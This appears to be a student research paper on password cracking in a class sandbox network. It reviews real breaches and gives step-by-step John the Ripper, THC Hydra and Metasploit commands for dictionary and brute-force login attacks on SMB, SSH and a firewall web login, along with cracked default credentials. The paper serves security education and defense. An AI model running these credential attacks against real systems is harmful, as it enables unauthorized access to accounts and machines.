Cracking a P@$$w0rd Tyler Lovell                               Van Bettis                               Michael Peritz

Florida State University             Florida State University             Florida State Universitytjl12@my.fsu.edu                    veb14c@my.fsu.edu                  mjp13g@my.fsu.edu

AbstractThe purpose of this research paper is to gain a better understanding of password of the vulnerabilities associated with passwords, how to exploit these vulnerabilities, and lastly how to defend against them. We will cover a broad range of attack methods in this paper including; brute force, dictionary attacks, breaking HASH values, and network and user errors. To carry out our research we will be using several tools, including John the Ripper, Metasploit, and THC hydra. They will be deployed in a sandbox environment to detect vulnerabilities and attempt to gain access to both our servers and those of other class members. After we have completed our testing, we will report our findings, delve into detection methods, and explain what can be done in order to fix and defend against these vulnerabilities. It is important to understand how attackers use these tools to crack passwords in order to defend against them and develop password procedures that are strong enough to avoid a breach in system integrity.

Keywords: Password, John the Ripper, Password Cracking, Audit, Authentication,      Reaver, THC Hydra, Brute Force, Dictionary Attack, HASH

IntroductionMoney, personal information, and even nuclear launch codes are all protected by passwords. Imagine if a hacker obtained the password to any of the items above. The scope of this paper will be password cracking. By executing different password cracking techniques, this study will find the best method to crack a password. Through discovering the most optimal password cracking method, the most secure password policy is revealed. This is why it is important to research and understand how passwords are broken. By understanding how passwords are cracked, we can create more secure ones to protect our current way of life. The first step in doing this is to understand all the components that go into password management.

What is a password? “A password is a secret (typically a character string) that a claimant uses to authenticate its identity” (Scarfone, Souppaya, 2009, p. 2-1). Authentication is the act of confirming one’s identity. Typically, a unique identifier, such as a username, is paired with a password to permit access into some account. Authentication can involve something the user knows, has, and is. For example, Alice goes to the automated teller machine to (ATM) withdrawal some funds. Alice knows her pin number, she has an (ATM) card, and she could use her fingerprint as something she is.

What are passwords used for? Passwords are used to protect data, systems, and networks. For example, passwords are used to authenticate users to their accounts and other applications like email. Passwords are also used to protect stored information and data. Examples of this would be password protecting a single file, using an encrypted hard drive (Scarfone, 2009). The two major forms of passwords are PIN and passphrase. A PIN is by definition a personal identification number that is only digits. PINs are usually 4-6 digits in length. A passphrase is typically a long password with letters, numbers, and symbols, which can be very secure if dictionary words are avoided, and the numbers, letters, and symbols are diverse.

1

How are passwords generally exploited? There are three major ways passwords are cracked. The first one is called a brute force attack. It consists of trying every letter, number, and symbol possible to crack the password. Included in the brute force attack family is the dictionary attack, where the attacker creates a library, links to an account and loops through the dictionary library until the correct password is found. Another popular attack is social engineering. This is where the attacker communicates with the target to obtain information that will assist in achieving the password attack. For instance, let's say Alice asks Bob what street he grew up on (maybe because she says she has a friend from his area). Later, Alice is trying to hack Bob’s email. From a 15-minute conversation she knows his birthday, where he grew up, his favorite food, and his first car. So Alice puts in his email and selects that Bob forgot his password and would like to answer the security question. The question asks for Bob’s first car, Alice answers the question, and then creates a new password effectively gaining access to Bob’s email. The final and most technical method is the cryptographic method. This involves discovering the technique used to encrypt the data by discovering the key using cryptography. Please note that these methods are not mutually exclusive. The best password attacking, method or software should include aspects of all three. For example, Alice uses the brute force attack by creating a dictionary to hack Bob, but she couples it with the social engineering method by putting information in the dictionary that she gathered from interacting with Bob himself.

The scope of this paper mainly deals with passphrases. The obvious vulnerability with password protected systems is that a password can be cracked. In this paper, we will reference literature germane to the topic, discuss the environment used to research these attacks, and demonstrate three ways passwords can be cracked. Included in the germane references will be known attacks. Included also will be known effective methods for creating passwords. Later in this paper, countermeasure and detection methods for known attacks will also be addressed. It should be noted that a strong password policy is the baseline for secure systems.

Literature Review

In this day and age in the digital era, passwords have become the standard method for user authentication.  They are unavoidable when trying to secure a resource, be it your Facebook account or a secure server in the workplace. It is because of their widespread use that passwords are perhaps the most common vector for attack amongst hackers. Some examples where hackers have targeted users’ passwords include; the Ashley Madison scandal from 2015, the Bitcoin “brain drain” attacks, the current ongoing ransomware attack against a Los Angeles hospital, the attack against British Airways in 2015, and the list goes on and will be discussed in more detail further on.  This paper will be focusing on identifying and explaining some of the common methods hackers used in these situations, as it is important to understand how they work in order to effectively defend against them.

Contrary to popular belief, password cracking is not just when an attacker sits down and repeatedly guesses a user's’ password. In fact, more often than not, the first step in password cracking is to use another vector of attack to obtain the files containing the encrypted passwords as they are stored on a system through various means. In the Ashley Madison case, the attackers retrieved a large amount of data from the website's database, including the hashed password files for the corporation in charge of the website ALM. They then released them to the public (Mansfield-Devine, 2015). These released files can be decrypted using popular tools such as John the Ripper, and then the passwords can be used to further breach the website and company resources.

Another popular means for obtaining passwords is to exploit a weakness in how they are stored in order to retrieve them in a plaintext, or written in a human readable format. In the Bitcoin hack in mid-February of this year, hackers targeted the websites method of storing passwords in what they call a “brain wallet” (Goodin, 2016). A brain wallet is the use of a passphrase to directly access and spend the user’s funds. For example, Alice has 10 bitcoins she wants to use. So she types in her passphrase which is “My favorite color is pink.” The system then runs the phrase through an encryption method that generates Alice’s private key and authenticates her as the user. Now that Alice has been

2

authenticated using her passphrase, her “brain wallet” allows her to spend the money without going through any more steps. As you can see, the obvious problem with brain wallets is that they rely on the human user to generate a strong enough passphrase, and as time has shown, humans are an awful source of entropy. In addition to this, brain wallets do not use any form of cryptographic salt and involve passing a plaintext phrase once through a hash method such as SHA256 (Goodin, 2016).  As a result, the hackers were able to easily crack user’s passphrases and generate the encrypted private keys using offline dictionary attacks. These passphrases and private were then used to withdraw the victim’s funds. Over the past six years it has been estimated that roughly $100,000 has been stolen using this exploit in Bitcoins password protection method

More often than not, people like to keep their life simple and re-use passwords and usernames across a large number of platforms, websites, and services. As a result, when one location is compromised as a result of weak security or persistent attackers, other sites are affected and compromised as well.  British Airways is one such company that has been victim to a data breach as a result of their frequent flyers poor password security management. Last April British Airlines released a statement saying “British Airways has become aware of some unauthorized activity in relation to a small number of frequent-flyer executive club accounts. We would like to reassure customers that at this stage we are not aware of any access to any subsequent information pages within accounts, including travel histories or payment card details” (Network Security, 2015, p. 2). These types of press releases are common when cyber-attacks are made against a company and are used as part of their incident response strategy. They said that this attack was the result of a third party that was “using information obtained elsewhere on the Internet, via an automated process” (Network Security, 2015).  Essentially, a hacker obtained usernames and passwords from another site that was compromised and then, with the hope that the users had reused them elsewhere, performed brute force attacks against the system. In response to this attack, British Airlines did perhaps the best thing they could have done, they immediately locked down the accounts and reset all the passwords.

Perhaps the easiest way hackers are cracking people’s passwords is by using generated lists that contain the world's worst and most used passwords and conducting dictionary attacks.  Every year SplashData, a company that provides security applications and services for more than 10 years, releases a list of the world's worst passwords. To security professionals this list is an amusing joke but in reality it serves as a lesson about why those passwords exist and the terrifying reality that people actually use them. In an experiment done by CSO which involved using SplashDatas list and database of roughly 68,000 unsalted MD5 password hashes from website MMO King that was leaked last year (Ragan, 2016).  It took the team 45 minutes using Hashcat on Kali Linux to crack 80% of the list. That’s roughly 54,000 passwords and accounts compromised in 45 minutes because of poor password policies amongst gamers (Ragan, 2016).

With all of these data breaches obtained through the abuse and hacking of user’s passwords and password protection systems, companies have begun to crack down and harden their password policies and management. Many companies, such as Apple, Google, Facebook, and in general every security-conscious service provider, are using encryption and storage methods that are incredibly time consuming and difficult to break. These companies run their passwords through encryption methods several times while utilizing salt values that are specific to each password, requiring anyone wanting to crack them invest an enormous amount of time and resources (Goodin, 2016).

Last year in the United Kingdom, a government-commissioned survey discovered that 90% of global industrial companies had suffered some kind of security breach (Ganesan, 2016). These breaches were in part caused due to the complexity involved with password management for the hundreds or, in some cases thousands, of employees all with different levels of access rights and privileges. The solution to this is invoking the use of a password management solution, as it can provide a critical middle-ground between leaving passwords at risk and keeping them locked up to the point where time and productivity is wasted while waiting for approval (Ganesan, 2016). These password management solutions work by scanning the company's Active Directory and providing a comprehensive overview of users, their passwords across all devices and operating systems, and the permissions

3

associated with them. This allows for the security administrator to easily manage and reset all passwords across the company, effectively bringing users under their control and policies. These password managers also allow for the administrator to generate reports on the user and privileges associated with each password and user (Ganesan, 2016). In theory, a password manager should be flexible and allow for easy access when dealing with temporary users, as well as be accessible from any device as required across sites. At a time when nefarious activities are at an all-time high, organizations need to be on high-alert and constantly managing logs and passwords. These management tools allow for ease in overcoming the threat posed by insecure password use as well as increasing visibility and transparency, without requiring additional administrative time or resources (Ganesan, 2016).

However, while most companies are increasing their encryption strength and password management protocols, governments are attempting to force them to weaken them.  In the United Kingdom for example, they are working a new controversial bill titled the Investigator Powers Bill. The bill essentially enforces that internet service providers must keep customer records (internet usage) as well as force companies to provide backdoors for law enforcement and intelligence agencies (Network Security, 2016). In a recent statement, Apple comes out against this bill by saying that, “A key left under the doormat would not just be there for the good guys. The bad guys would find it too.” (Network Security, 2016, p. 2).

Lab Systems Settings and DescriptionNetwork Topology

The basic network topology of our group’s virtual environment breaks down very easily; Our Windows, Ubuntu, and Apache VMs are behind our firewall PFSense. Outside of our firewall (PFSense) we have our Security Onion and Kali Linux. All of these machines are being run on a central network in which the other teams are connected to us, essentially creating an internet highway where the on-ramps and off-ramps lead to each teams own infrastructure. In this analogy, the PFSense would act like a road closing or blockade to permit only approved traffic. This is the network that we are working on and have set up.

System Configuration

For this project we were given multiple virtual machines, VM’s, within a Virtual Private Network or VPN for short. Now a VM operates just like any normal computer would, but because they are accessed virtually, the VM itself has no physical existence. There are some minor differences and most importantly benefits to these. Specifically, by using the VM you can run a different operating system than the one currently found on the computer accessing the VM. Also, since these VMs are not necessarily connected to a specific computer, they become sandbox environments, in which you set the variables and controls.

A total of 18 machines were given to us by our instructor; five Apaches, five Windows 2008 instances, a Security Onion, five Kali Linux machines, and PFSense firewall and Comodo. All of these we received in a “new” state, by which we mean that we were turning them on for the first time. This was the true test because everything needed to be configured. First we started with the Windows machines, booting up each machine and running through the initial setup process, the basic configuration of the workstations.

The Apache machine was extremely easy to set up, after starting the computer up for the first time, we navigated to the CMD (command) line screen. Due to LAMP, Linux apache MySQL, PHP, already being set up, we navigated to our IP address on the web to find our home page. This unfortunately did not work on the first try, so we went back to the command line and ran the command service apache2 start which essentially started the service apache. After revisiting the IP address on the web we were confronted with the apache home page. This meant that we had successful got our homepage up and running. We have yet to use our Ubuntu VMs for anything relating to this project however we have already put them behind the firewall so as to secure our systems in its entirety.

4

After this, we then booted up the PFSense firewall and navigated the terminal window until finding the command that booted up the inline web interface (command 11 to be exact). Since we were already given a list of the IP addresses associated with each machine on the network, all that was left was to add each of them in behind the firewall. To run our Windows machines through the firewall, we opened the Internet connection in the bottom right hand screen, then by clicking on the Local Area Connection Status (in this case is was LAC 2). After clicking properties, we then clicked on the Internet Protocol Version 4 (TCP/IPv4) item and then select properties. This then brings up a new pop up as seen in figure 1 within the appendix. After this is open you set the IP address as the static IP of the machine you are currently using, and the subnet automatically fills in for you. The default gateway IP is the IP address of the external firewall you are using, in this case it is the IP address of the PFSense that our team was assigned, 192.168.72.81. After this has been completed, the machine has now been successfully put behind the firewall. We continued with this for the Ubuntu, windows and Apache machines that were assigned for our group, except out honeypot.

So now that each machine is up and running, the firewall is up and running and each machine is put behind the firewall except our honey pot. So we switched focus to the defensive side of this, the Onion. The Security Onion has been installed on a VM and is our watchdog for this project. It runs on the network and monitors certain IP addresses, by doing this we can see what is occurring on those machines such as logins and other various data. This is critical so we know what is occurring and where these actions are occurring, helping us to establish who is trying to attack us and the source of the attack. The Security Onion was actually the easiest VM to set up because all you had to do was run the installer, and tell the Onion to monitor the network. After we set the Security Onion to monitor the IP addresses of our machines, it was time to move onto the next step.

The next step was just getting our Kali Linux machines up and running. This required that we start the machines for the first time. For some of us there was not an interface that had already been set up on the machine. This required that we had to install one, that being the gnome interface. The reason we chose the gnome interface was due to it being an easy and fast install and required the least steps as well as provided a comfortable interface that familiar. Due to this machine not needing protection, it was left outside of the firewall.

Password Cracking Threat TypesCryptography

Cryptology is the study of secure communications. Cryptography is the branch dealing with the design of algorithms to secure information. The most effective tool in securing passwords is the One-way hash function. Hash functions are used to keep passwords private. The hash function puts a variable length string into a fixed-length value referred to as a hash code. A hash of a password is stored by an operating system rather than the password itself. Thus, the actual password is not retrievable by a hacker who gains access to the password file. In simple terms when a user enters a password, the hash of that password is compared to the stored hash value for verification.

The vulnerability to passwords is essentially time. For example, if a hacker had a life span of a trillion years, he or she could crack any password, without even knowing how to code. With the Data encryption standard (DES) using the minimal 56 bit key to create a cipher text blocks of 64bits would take 2^56 years to crack using a normal computer. The drawback is that it is vulnerable to cryptanalysis and the 64-bit size is not that large. It would only take an hour to with a super computer. However, use a 128 key bit size using the advanced encryption standard, it would take the supercomputer 5.3 x 10^17. The Triple DES does the same method as DES, except it does the calculation three times using two or three unique keys. This would be the best design for security, but the 3DES is slow and does not work well with modern software, and also produces only a 64-bit cipher text.

The password is susceptible to password attacking methods. Offline dictionary attack is the first, and will be demonstrated in this paper. The attacker obtains the system password file and compares the hashes of his or her dictionary. The attacker may not always be a stranger. Password guessing against a single user targets users the

5

attacker knows. The attacker guesses the password manually, but the attacker knows the victim, or at least has information about the victim. This makes the attacker's guess more educated. This attack becomes even more feasible when you consider the security question safety valve. What street you lived on when you were eight, your first car, and your first grade teacher is all public record. Information like this could also be revealed in a fifteen minute conversation. Sometimes employees forget to logout of their systems, and attackers can hijack the workstation. Exploiting user mistakes like falling for a phishing email or sharing too much information is always a possibility. Similar to that is using the same password for multiple accounts. If the hacker, breaks one password, the attacker will try that on all known accounts. Those who have the same password for different accounts are at greater risk for more loss.

To make it even more time consuming to crack passwords, the technique of adding a salt value to a hash algorithm is widely used. The salt value is a fixed length value added to the hash function to create a fixed- length hash code. When the user creates a password, a salt value is assigned according to a pseudo random number generator. The hashed password is stored with a plaintext copy of the salt. When a user is being authenticated, the user provides an ID & password. The user ID is used to reference the hashed password and the salt value. If the system’s calculation matches the user input to the shadow file, then the user is granted access. Salt makes passwords more unique because each user is assigned a unique salt value. For example, if two users use the same password, the hash value will be different because each of user is assigned a distinct salt value creating a unique hash function result. The salt value makes the offline dictionary attack much harder to execute. For a salt value of b bits, the number of possible password is increased by a factor of 2^b. In other words, let’s say an attacker has a hash file without salt values. For every hash created, it becomes increasingly more likely that each subsequent guess will be correct. When the attacker creates a hash, he can check it against the hash file, and if the hash result is not there then that hash is not the hash belonging to any of the users. Conversely, if the hash file is salted, then using the dictionary attack is virtually impossible. Even if the attacker guess the correct password and hashes it, without the correct salt value the hash will not match. If the attacker miraculously guesses the salt value, it would be nearly impossible to find out whether a person with passwords on multiple systems is using the same password because each password, even if it is the same password, is assigned a unique salt value.

Hashing and encrypting are forms of cryptography, but hashing is different from encrypting. Encryption is a two way function. In other words, I encrypt something so it can be decrypted by the person I am communicating with. Conversely, hashing is a one-way function. Hash functions are not intended to be reversed. There are dictionary attacks, where the hacker will create a dictionary, write a script to scramble the numbers and letters into various strings, hash the newly created strings, and compare the newly hashed strings to a target hash file.

Attack Method: John the Ripper

John the Ripper is an open source password-cracking tool. Being an open source project, various security companies often release upgraded versions of the John the Ripper. The software is released in packages, and free for the public to download. The improvements usually are speed of the password cracking itself. For example, in 2011, Openwall, an IT security and products company, released a version of John the Ripper that cracks password hashes based on the Data Encryption Standard (DES) algorithm on CPUs 17 percent faster than the previous best results (Benzingna, 2011).

John the Ripper is commonly used among system administrators to enforce their password policy

(Sykes, Lin, Skoczen, 2010). The system administrator will continually run John the Ripper, mostly likely configured with certain specifications, against machines in the office; and, if an employee’s workstation password gets cracked, then that employee is not following the password policy. Also, note that the administrator could run the John the Ripper software with no specifications, which means even if the cracked password conforms to the password policy, the employee will still be asked to change his or her password. Along with cracking weak

6

passwords, John the Ripper is also used by system administrators to recover lost passwords on machines (Sykes, 2010).

John the Ripper basically just guesses at the password. It does this by randomly trying to produce a string that matches the password (Sykes, 2010). That is the basics, but John the Ripper is a little more complex. It has to be more complex because modern passwords are hashed for most machines worth attacking. First, what is hashing? Put simply, hashing is a one way function in which every key put in is processed according to an index. Basically you put in something like “Michael” and you get something like “BDBd 3465 fgh33 4567 ssdwe3” but usually much longer. Passwords are the most commonly used tool for authentication. When you create a password for an online account, amazon for example, amazon’s website takes that password hashes it and saves the hash of that password in a hash file. When you go back to the website, and put in your password, the website authenticates you as the true account holder by hashing that password again and comparing the hash of that password against all the other hashed password accumulated in the hashed password list file. If there is a match that correlates with your username, then you are authenticated and access is granted. John the Ripper takes advantage of this method of storing hashed passwords and comparing them to hashed passwords later. John the Ripper encrypts its guesses with the same algorithms used to create the passwords. After John the Ripper hashes its guesses, it compares the newly created hashes to the original hashes (Sykes, 2010) just like in the Amazon example.

John the Ripper can be run in four different modes. The first operation is mode is called Incremental. The Incremental mode is the simplest. This mode applies the brute force method discussed earlier. Wordlist and single mode apply the Dictionary method. The wordlist mode uses text that can be defined by the user as the dictionary. However, the Single mode gathers data from the password file itself. Lastly, External mode lets the user use defined modes, which the user creates using programming language. (Sykes, 2010). With external mode the administrator can run his own concoction, most likely a modified version of the other three modes.

John the Ripper was created back in 1995. Since John the Ripper is an open source project, many modifications have been made over the years. The basic John the Ripper will support many formats. It can crack three UNIX hashes: DES, double DES, BSDI extended DES, FreeBSD MD5, and OpenBSD Blowfish. Also, Kerberos AFS and windows LM hash are supported. (Sykes, 2010). However, the John the Ripper software is not without its limitations. The major hindering factor is that John the Ripper can only crack known formats. This means that if a new encryption method is created, it would have to be programmed into the John the Ripper software in order for it to be able to encrypt its guess so the software could compare the new and the original password hashes. Also, John the ripper could not be used directly against a machine that used random encryption methods because the format must be in John the Ripper's source code in order for John the Ripper to effectively crack the password of the desired target machine (Sykes, 2010).

John the Ripper is most useful to an administrator trying to maintain a password policy, or to recover a password for a key machine. It basically is a free brute force and cryptographic password cracking software package. However, it’s limitations in format learning and application leave room for improvement. Being the commonly worked on open source project that it is, these improvements will inevitably be made and implemented.

To run the attack both the wordlist/dictionary and the hash file must be in john the ripper's run file, which must also contain the executable file. This way, when you point john the ripper at the hash file, it can use the wordlist because it is the same folder. Refer to appendix figure 19 you can see the result of putting the newly created folder “J.t.r in the security folder. Subsequently you will see that in the “jtr” in that folder. The final location of the path is the run file which contain john.exe and the hash file “bo3.hashfile.txt”. Refer to appendix figure 20 to see files inside the run folder. Figure 21 in the appendix then shows the command to be executed. The command prompt of our windows machine. The exact code to run the brute force attack was “John.exe b03.hshfile.txt” The brute force attack discovered the passwords on the hash file. Once, the victim’s computer was entered, a batch file was created and

7

executed in the command prompt, the program written on the batch file put the computer into an infinite loop effectively crashing it. The batch file included the text: “Start start start start start start start stop.” This was done to show, in a non-harmful way, the dangers of password attacks.

Brute Force and Dictionary Attacks

When it comes to methods used by nefarious individuals to discover your password, brute force and dictionary attacks are the two main attack methods. These two attacks can be boiled down to guess and attempt. The person attempting to compromise a password will guess a user account and a password combination and continue to try new combination until they are successful. The details that separate these two begins here.

Dictionary attack is the simpler of the two and is made up of a set of libraries. These libraries are generally made up of popular usernames and popular passwords; however they can also be made up of dictionary words, random strings, or keyword information pertaining to a specific user you are targeting. The main thing here is that the attack is limited to the contents of the libraries being used. There is no random combination or random guessing.

Brute Force attacks on the other hand, overcome the deficit of dictionary attacks. A brute force attack will attempt to guess random passwords and random usernames, unless defined otherwise. This can be done manually, however it is generally carried out by an automated software that runs through different combinations of letters, numbers, special characters, and symbols. Brute force attacks generally take a long time and is dependent on the size of the character set defined and the speed of the computer being used. With the knowledge that a user has a password of eight characters, attempting every possible combination on the keyboard would take roughly 2,250,000,000,000,000 attempts. Depending on the machine being used this could take anywhere from 200 years with a home machine to near seconds with a super computer.

Attack Method: THC Hydra

In order to conduct our research on Brute Force and Dictionary attacks, we will be using THC Hydra on Kali Linux to attack a windows 7 machine and PFsense firewall. THC Hydra is a tool designed for network logon cracking through the exploitation of various services. It is a public open source project designed by van Hauser and supported by David Maciejak to help security auditors with detecting weak passwords being used to secure resources as well as giving researchers a tool to show just how easy it can be to gain unauthorized remote access to a system. It is one of the most well-known and used remote authentication cracking services available because it is fast and versatile. Its speed is due to its use of parallel connections, meaning it can open multiple connections to the target server and perform multiple transactions all in parallel with each other. The second selling point of being versatile is because of the 50 different protocols that it can perform rapid dictionary and brute force attacks against. Some of the included protocols are; telnet, http/s, SSH, POP3 MYSQL, MS-SQL, Oracle, SMTP and SMB.

The first step in any remote attack is to identify the machines on your network and check what vulnerable ports they have open. To do this we made use of the popular network mapping tool, Zenmap. We conducted a deep scan of network ranges 192.168.72.0/24, 10.0.20.0/24, and 10.0.10.0/24 (appendix, figure 1). Our goal was to find servers that are running one of the protocols that are vulnerable to attacks from THC Hydra both behind firewalls and outside of firewalls. To narrow it down we looked for servers that are specifically running the server message block (SMB) protocol. The reason for this is that it is automatically activated on all Windows devices and would easily allow us to conduct our brute force attempt at logging into the machine. We also searched for servers running HTTP and SSH as these can be extremely vulnerable to exploitation.

The Microsoft Windows server message block (SMB) protocol is used in network file sharing. It is made up by a set of data packets, each of which contain a request sent by the user's client or the response from the server. While SMB’s main function is for file sharing, it is also used for several other functions such printing over a network, determining other Microsoft SMB protocol servers on the network

8

Once we had a list of all the machines that were vulnerable to the protocols open to being exploited, the next step was to attempt the dictionary and library attacks against a single machine at a time. This is done with THC Hydra through the execution of simple commands. Hydra commands take the general syntax of: Hydra -l username -P passwordlist.txt xxx.xxx.xxx.xxx vulnerability. With this command we were able to replace username with either a list of usernames or with a specific username. Lucky for us we knew that the username admin is in use and as such will be the one we are going to target. Next, we would had to replace passwordlist.txt with our own password dictionary or library. We attempted several dictionaries, including the ones that come with kali Linux as well as ones available for download such as SplashDatas list of worst password choices. Next, we had to replace the xxx.xxx.xxx.xxx with the windows servers or that we have determined are using the SMB protocol or with the firewall we wished to attack. The last part of the command, vulnerability, can be substituted with other port protocol services that THC Hydra supports, but for our research we stuck with the protocols mentioned previously. The full command for our dictionary attack against the vulnerable windows machine was Hydra -l admin -P rockyou.txt 192.168.72.54 smb and can be found in the appendix figure 3.This attempted the username admin with every password listed in the rockyou.txt file.

To conduct a brute force attack the Hydra syntax is as follows and an in-environment example be found in the appendix as figure 6 :Hydra -t 1 -V -l admin -x ‘8:8:Aa1”@#$!(_)+`~?:%^&*.\’ 10.0.20.1 http-post-get ‘/index.php:username=^USER^&password=^PASS^:incorrect'. This attack is targeting the 10.0.20.1 firewall, specifically the web-gui hosted by the firewall using port 80. The first part is relatively the same with the addition of -t for number of tasks and parallel connections, and -V for a verbose output. The next part starting with 8:8 defines the min and max length of the random password combination attempt. This is followed by the range of possible characters and symbols to be tried. The last part is perhaps the most important and the trickiest because it requires knowing how the web page being targeted with http-post-get handles the username and password attempts. In this case it was fairly simple as the firewalls web-page 10.0.20.1/index.php handles the submission of password attempts as outlined in the command. This command takes a tremendous amount of time and computing power to execute fully and as such we let it run for several days.

Attack Method: Metasploit Metasploit is a tool that scans your network for a variety of vulnerabilities mainly for ports that are openly available. After the scan has been completed on the system, the user can now implement attacks on these vulnerabilities to see just how effective their security implementations are. This allows you to test to what extent these vulnerabilities can be exploited to. Before we can exploit the vulnerabilities first a scan must be done on the system.

Of course there will be some ports open after the scan has been conducted, like port 22 which is Secure Shell (SSH), port 25 is Simple Mail Transfer Protocol (SMTP). A few others are port 80, 69 and 443. Port 80 is for Hypertext Transfer Protocol, 69 is File Transfer Protocol (TFTP) and 443 is the Hypertext Transfer Secure Protocol (HTTPS). The reason we scan these ports are we want to make sure some of these that are open become closed, such as port 22 and 69 and 25. The reason for this is because, port 22 allows for command line control which can allow others to take over your machine with relative ease, port 69 is not needed because there is no need for files to be transferred between these machines. Lastly, port 25 should be closed as there is no need to send and receive mail on these machines due to the users being our team and our team can communicate outside of these machines.

Now that the vulnerabilities have been identified the real fun can begin, exploiting them! Since, Metasploit is a tool that is open source, meaning that it is out there on the web for anyone and everyone to alter, the expanse of attack types found within Metasploit continues to grow constantly. Metasploit breaks down these attacks by the exploit itself, but specifically we are looking at the passwords themselves, and Metasploit allows you to test the network for weak or reused passwords. With the Pro Edition this program can run brute-force attacks against databases, and web servers. It can even further show the extent of damage these exposed credentials can cause.

9

Using and Accessing Metasploit

For our research, we used the program Metasploit which is ran through the terminal interface in the the Kali Linux machine. To access the Metasploit software, we needed to logout and the admin user and re-login in as the root user. After doing we were able to open Metasploit, via the icon located on the sidebar (appendix, figure 7) or by typing msfconsole in the terminal shell:

root@4777KaliC05:~# msfconsole

After typing this command in the shell will then take a few moments to load the Metasploit program, we were then presented with the left hand side of the command line showing:

msf >

Once this is seen the program has now been executed and we were able to access the modules within Metasploit.

To utilize our password attack we used the auxiliary module which performs sniffing, fuzzing, scanning, and other various duties. This was the main module used, located within this are several sub-modules used to perform various actions within the msf command line. Specifically we used the scanner module and within this module we chose to use two subsections that were SMB and SSH. To utilize these modules and submodules you need to run the following commands either for SMB or SSH:

msf > use auxiliary/scanner/smb/smb_login

msf > use auxiliary/scanner/ssh/ssh_login

Once these commands, depending on which exploit is being utilized are entered in we were now presented with a changed command line.

msf auxiliary(smb_login) >

msf auxiliary(ssh_login) >

What this showed was that the exploit was now loaded into Metasploit, and now all that was left was going into the options menu with either of these exploits to set the target host, and password and username to be used. This was accomplished by typing in:

msf > use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > show options

msf auxiliary(ssh_login) > show options

The output of this command can be seen in (appendix, figure X, now we just changed the options that pertained to the specific attack being utilized. Initially, we performed this attack against a single machine so that will be demonstrated first. After performing a single target attack we switched gears and targeted a IP range and utilized a username and password file, each containing multiple lines of potential usernames and passwords. This was to demonstrate how this attack could be used against multiple machines, in which the usernames were not known.

For the single target attack using the SMB port 445, we typed in:

msf auxiliary(smb_login) > show options

msf auxiliary(smb_login) > set RHOSTS 192.168.72.49

msf auxiliary(smb_login) > set USERNAME admin

msf auxiliary(smb_login) > set PASSWORD 4777super

10

These commands set the parameters for the exploit, in this specific instance the parameters were set to exploit the initial setup in the machine 192.168.72.49, in which the username was admin and the password was 4777super. After these command are entered we simply needed to type:

msf auxiliary(smb_login) > exploit

Metasploit then ran the attack and we waiting to get a return on rather or not the attack was successful. The success of the attack was represented as a [-] for a failed attempt and a [+] for a successful attack. This is shown in appendix, figure 10).

To exploit this attack using the port 22 or SSH you use the command.

msf auxiliary(ssh_login) > show options

msf auxiliary(ssh_login) > set RHOSTS 192.168.72.49

msf auxiliary(ssh_login) > set USERNAME admin

msf auxiliary(ssh_login) > set PASSWORD 4777super

This exploit will attack port 22, in hope the the SSH port is open, with allowed us to run the exploit through the SSH tunnel. This attack however was unsuccessful, due to the pfSense firewall that was used to protect all the machines on the network.

Now that we discussed single target attacks we can go to the portion where Metasploit really shines which was being able to attack a range of machines with username and password list. This was extremely effective due to being able to every machine on the network with one command versus attacking each machine individually. This attack tries each username and every password listed, after doing so Metasploit will then switch to the next username and attempt every password for each successive username.

To implement this attack we needed to first, from within the terminal navigate to our /usr/share/wordlists/rockyou.txt.gz. To unzip this pre-installed wordlists we ran the command:

root@4777KaliC05:~# gunzip rockyou.txt.gz

Now that this file was unzipped we were allowed access to the now available rockyou.txt. We then ran the series of commands to execute our attack:

msf > use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > show options

msf auxiliary(smb_login) > set RHOSTS 192.168.72.12-57

msf auxiliary(smb_login) > set USER_FILE /usr/share/wordlists/username.txt

msf auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/password_list.txt

We set the RHOSTS to attack all the machines located on IP range 192.168.72.12 thru 192.168.72.57. The reasoning behind this was after looking at the allotted machines, only machines 12 through 56. So there was no reason to attack machines 0-12 and 57-97, as we were machines 57-82 with the rest not being used. The results of these attacks are shown in the end of the Brute Force and Dictionary Results section below.

Brute Force and Dictionary Results

As was mentioned, our first step in conducting any type of online attack was to scan networks for machines that are vulnerable to the type of attack we are conducting. Having executed the scans mentioned previously, we found that, for the 192.168.72.X\24 network several machines were left vulnerable to an SMB targeted attack. A full list of

11

machines can be found in image5 in the appendix, however for this exercise we specifically targeted the windows machine 192.168.72.54. Next we took a look at the results for the 10.0.10.0/24 and 10.0.20.0/24 networks. Actually scanning these networks took a long time because of the firewalls that were protecting them from ping scans originating outside of the network. However we were able to scan the machines located on the networks and the results of these scans were largely the same. Multiple windows machines were found running the SMB protocol, but all of them were being filtered by either the 10.0.10.1 or 10.0.20.1 PfSense firewalls deployed by the networks administrator.

After we had our target machine, 192.168.72.54, we launched our attack starting with the single target dictionary attack. THC Hydra ran for several hours, looping through over 14 million different passwords before finding a successful combination; The Username was Admin and the Password was 4777super (appendix, figure 4) This was unexpected as it was the default credentials for the system. Launching this attack against several other machines resulted in no matches found. We believe this was due to the users changing their passwords to something more obscure, as well as changing their login usernames. The next step was to see if we could find the login credentials using the same method but targeting the firewall web-gui login pages at 10.0.20.1 and 10.0.10.1. After looping through our dictionary of possible passwords, we were unsuccessful. Again, we believe this was due to the network administrators changing the default credentials to something more secure.

With the completion of our single target online dictionary attack completed, we moved on to attempting single target online brute force attacks. We narrowed this down to the 10.0.20.1 and 10.0.10.1 firewall web-gui login pages as they are using an unsecure HTTP web page. We began this attack mid-way through the semester, looking through every possible eight character long combinations. THC Hydra averaged roughly thirty attacks per second, which is incredibly slow by today's standards of computing power. To complete every possible combination, we calculated it would take 200 years. As such this attack was unsuccessful and was unable to find the passwords used on the firewalls.

After executing the dictionary exploit within Metasploit against the range of machines we were returned with couple of positives. These results can be found in (appendix figure 9), showing the successful attempts with the [+]. These successful attempts show both the username and password combination that were successful in the format “success: WORKSTATION\admin:4777super” This is extremely helpful due to the password list being used contained 50,000 entries. Also, be turning off the VERBOSE option using the command:

msf auxiliary(smb_login) > set VERBOSE false

We were able to turn off the return attempts, which prevented against creating a cluttered screen and showing only the successful attempts. This made it significantly easier to navigate the return log, since we did not have to scroll through thousands of entries. However, at certain times it may prove beneficial to have the ability to review the exploit logs in their entirety. A copy of each exploit attempt log can also be saved in Metasploits’ internal database for further analysis.

Finally, by enabling the STOP_ON_SUCCESS parameter using the command:

msf auxiliary(smb_login) > set STOP_ON_SUCCESS true

